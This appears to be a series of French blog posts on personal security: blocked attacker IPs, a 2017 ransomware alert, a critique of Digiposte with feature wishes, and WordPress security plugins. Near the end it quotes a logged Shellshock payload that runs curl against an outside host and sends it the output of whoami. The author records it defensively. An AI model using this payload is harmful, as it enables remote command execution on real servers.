Fred'ô farias06

UFC Que Choisir propose une page unique pour demander le retrait de ses données personnelles face aux démarcheurs et revendeurs de prospects : https://www.respectemesdatas.fr/

Voici la liste des IP que j’ai complètement bloqué, trop d’attaque :

91.200.12.114 (Ukraine)
91.200.12.65 (Ukraine)
91.200.12.4 (Ukraine) 
178.89.110.135 (Kazakhstan)
122.114.251.82 (Chine)
222.86.214.132 (Chine)
192.99.63.202 (Canada)
112.78.5.70 (Vietnam)
81.177.135.161
221.2.137.143

Les premiers articles sortent :

• http://www.francetvinfo.fr/internet/securite-sur-internet/cyberattaques/direct-une-cyberattaque-mondiale-frappe-entreprises-et-administrations_2257807.html 

• http://www.cert.ssi.gouv.fr/site/CERTFR-2017-ALE-012.pdf

• https://www.ssi.gouv.fr/actualite/alerte-campagne-de-rancongiciel-3/

• • Référence  : CERTFR-2017-ALE-012 : 

• Faire la mise à jour :Microsoft MS17-010 :

  https://technet.microsoft.com/fr-fr/library/security/ms17-010.aspx

   

Une fois encore c’est Windows qui est impacté … les informations que j’ai :

• Quand le PC affiche ceci il faut le rebooter car contrairement a ce qu’il marque il est en cours d’encryption (ensuite il faudra mettre le disque sur une autre machine):
• 
• Le message qui apparait à la fin de l’encryption :
• 
• Il faut supprimer cette signature (information à confirmer)

Il semblerait aussi qu’il y ait un fichier perfc.dat ou dllhost.dat ou perfc sous C:/Windows/ à supprimer (et non perfc.dll) . Cette information est aussi à confirmer. 

J’ai reçu l’email de Digiposte :

En 2016, Digiposte s’est enrichi de plus de 350 organismes. Démarrez 2017 du bon pied en regroupant vos relevés, attestations et factures dans Digiposte.

BESOIN DE PARTAGER VOTRE RIB AVEC UN PROCHE ? CONNECTEZ-VOUS À DIGIPOSTE.

Mais c’est vraiment n’importe quoi … il faut travailler sur la sécurité !

Il faut mettre en place :

• une double authentification comme le fait Google+ ou Facebook, alors que eux n’ont pas mon RIB. (optionnel & uniquement pour les abonnés)
• une interface pour voir les heures, dates, IP, navigateur de toutes les connexions. Comme le fait Google, Facebook, …
• l’envoi d’un email a chaque nouvelle connexion … comme le fait Google, Facebook, … (optionnel)

On ne peut pas mettre des documents plus important que sur Facebook, Google, Twitter, et avoir une sécurité moindre.

Nouvel email ou plutôt SPAM n°121916 de Wordfence :

Maintenant il faut vérifier les faits, est-ce que je me fais attaquer par les Russes :

La sécurité passe aussi par l’analyse des logs d’Apache !

Je viens de faire deux POST sur la sécurité :

• https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-des-attaques-brute-force/ : Mon analyse des attaques “Burte force”
• https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-a-partir-des-logs-dapache-des-attaques-par-injection-sql/ : Mon analyse à partir des logs d’Apache des attaques par injection SQL en méthode GET.

Attention a ne pas négliger la sécurité sur Wordpress ! Il existe de bon plugin pour la sécurité :

• Word fence Security. Version 6.2.8 | Par Wordfence
  • Email a chaque connexion.
  • Email a chaque recommandation de mise à jour.
  • Diagnostic.
• All In One WP Security. Version 4.2.4 | Par Tips and Tricks HQ, Peter, Ruhul, Ivy
  • Filtre IP : Liste notre .
• Captcha by BestWebSoft. Version 4.2.8 | Par BestWebSoft
• WP-SpamShield. Version 1.9.9.8 | Par Scott Allen
  • Eviter le SPAM dans les commentaires.

Juste pour bien ce rendre compte, voici la commande pour voir le nombre d’attaques “Brute force” (voir le précédent post pour la création du fichier wp-login.txt). Certains jours on arrive a des nombres de connexions très important !

Beaucoup de progrès ont été fait sur Digiposte+ (#digiposte #digiposte+), maintenant il y a énormément de commerçants et bientôt il y aura la certification de diplôme. Mais le point noir c’est toujours la sécurité. La sécurité doit être supérieur à celle de Google ou même de Facebook ! Comment peut-on envisager de voir une copie de sa carte d’identité ou de son bulletin de paye dans les mains d’autres personnes.

Digiposte est un service de coffre-fort électronique (ou numérique). J’ai testé ce service Digiposte : https://www.digiposte.fr/ c’est un bon service mais il me semble qu’il y a quelques manques :

1. Le nombre de sites utilisant ce service n’est pas encore assez important. Mais les principaux acteurs sont présents ce qui est très bien. Ceux sont les banques qui sont les grandes absentes … Il est clair que La Poste est en concurrence avec des banques vu que c’est une banque, en plus certaines banques comme la caisse d’épargne a déjà un service de coffre fort électronique mais payant, et d’autres banques comme AXA Banque font payer les relevés …Mais le plus important c’est d’intégrer un maximum de site, Google a très bien compris cela et il essaye toujours d’être le plus ouvert possible. A noter aussi que pour l’Apple Store on ne peut pas vraiment dire que cela fonctionne bien. Très important
   1. Les plus grandes banques en France :
      1. BNP Paribas : absent.
      2. Les caisses d’épargne : absent.
      3. Crédit agricole : absent.
      4. AXA Banque : absent.
      5. Société générale : absent.
      6. CIC / Crédit mutuel : présent.
      7. La poste : présent :).
   2. Au niveau des services il manque :
      1. digitick.com : Vente de billet.
      2. phpnet.org : Hébergeur, le meilleur.
      3. Gaumont : Vente de billet.
      4. Pixmania :
      5. Décathlon :
      6. ….
2. Il faudrait le calcul d’un checksum sur chaque fichier afin que l’utilisateur puisse voir si le fichier est en doublon. Avec un système à “plat” il est très facile d’avoir des doublons de fichiers. Ensuite, c’est à l’utilisateur de prendre la décision de garder ou supprimer le fichier. Très important
3. Ajouter un colonne date modifiable par l’utilisateur, par exemple la date du scan n’est pas la date du document qui est scanné. En fait, il faudrait deux dates: date de dépôt du fichier et date d’édition du fichier (modifiable quand c’est déposé par l’utilisateur). Très important
   1. Voici les colonnes actuellement disponible :
4. il serait bien d’avoir une “preview” des fichiers. A faire
5. L’application IPhone est minimaliste, on a du mal à faire une recherche …A faire
6. Pour l’application IPad cela serait bien d’avoir un système qui permette la synchronisation des fichiers et pas seulement la visualisation. Cela permet de pouvoir disposer des fichiers en mode “Offline". Important
7. L’ajout du type de document dans les colonnes serait aussi un plus, actuellement il existe seulement Facture & relevé et c’est uniquement quand c’est un tiers qui transmet : (Important)
   1. Facture, ( Commerces )
   2. Relevé, ( Relevé Bancaire, Relevé de téléphone)
   3. Licence, ( Licence de sport )
   4. Photo, ( Pour Digishoot )
   5. Diplome, ( Diplome, Examen)
   6. Permis, ( Permis de conduire, Permis de bateau, … )
   7. Contrôle, ( Contrôle technique, )
   8. Identité, ( CNI , Carte grise, Passeport )
   9. Billet, ( Par exemple : billet d’avion, place avec QR-Code )
   10. Garantie, ( Garanti )
   11. Attestation, ( Attestation d’emploi, Attestation de sport, Attestation de mutuelle)
   12. Devis, ( Devis )
   13. Acompte, (Acompte )
   14. Courrier, ( Lettre importante )
   15. Acte, (Acte notarié )
   16. Comptabilité, ( Pour les personnes qui ont des entreprises ou SCI ou les auto-entrepreneurs )
   17. Paie ( Feuille de paye )
   18. Listes ( Carnet d’adresse, Listes diverses ).
   19. Santé ( Examen ).
   20. Facture Client ( Pour les auto-entrepreneurs ).
   21. Numéro de série ( Pour avoir le numéro de sérié de ce que l’on a acheté, le plus pratique étant de faire une photo de la boite lors de l’achat).
   22. Capture ( Un peu comme DigiShoot , un service de capture de site Web avec date de la capture par un Tiers , une sorte de DigiWeb . Mais bon cela serait un peu complexe si c’est sur Facebook , s’il y a besoin d’une authentification )
   23. Agenda ( Pour Nicolas … certain garde leur agenda)
   24. Autres (Pour les personnes voulant faire de l’archivage de document personnel comme des photos de vacance ou autres ).
8. Que l’application Digishoot soit gratuite (je sais j’abuse), actuellement ce service est gratuit dans d’autres assurances. Je trouve que cette application peut être utile : A faire
   1. en cas de sinistre,
   2. en cas de construction (affichage du permis),
   3. pour les associations qui veulent faire constater,
9. Avoir une notification quand on partage un document et que la personne y accède. A faire
10. L’ajout de la colonne taille . Quand on veut faire du ménage c’est pratique de commencer à supprimer les plus volumineux. A faire
11. L’ajout de la colonne date fin de validité (facultative), pour par exemple : les garantis, le contrôle technique, les CNI, …Le jours avant la fin de validité on reçoit un email. Cela permet de supprimer le document. Important.
12. L’ajout d’une personne (email + adresse : pour livraison d’un CD-ROM) dans les paramètres afin que le compte puisse être céder à un tiers en cas de décès. On va dire que c’est une option “testamentaire”, qui serait facultative. Important.
13. L’ajout d’une colonne ID unique, qui permet de faire un lien entre une application cliente et Digiposte. Le plus important quand on développe un service c’est de l’ouvrir un maximum afin de permettre une intégration facile (voir les produits Google). A faire.

Malgré tous les points à corriger, je pense que ce type d’application à de l’avenir. Il faudrait que le service se rémunère sur l’espace disque utilisé. Ou alors offre des services qui serait

Attaque sur mon serveur :

Un petit Whois sur : http://www.ntontomou.com/ : https://who.is/whois/ntontomou.com …. il reste plus qu’a contacter http://www.enom.com. Misère.

D’après les logs c’est pas son premier essai :

() { :;}; /bin/bash -c \“curl http://ntontomou.com/custom/ping.php?domain=sphinux.org\\&whoami=`whoami`\”

D’abord du PHP puis maintenant un soft en C.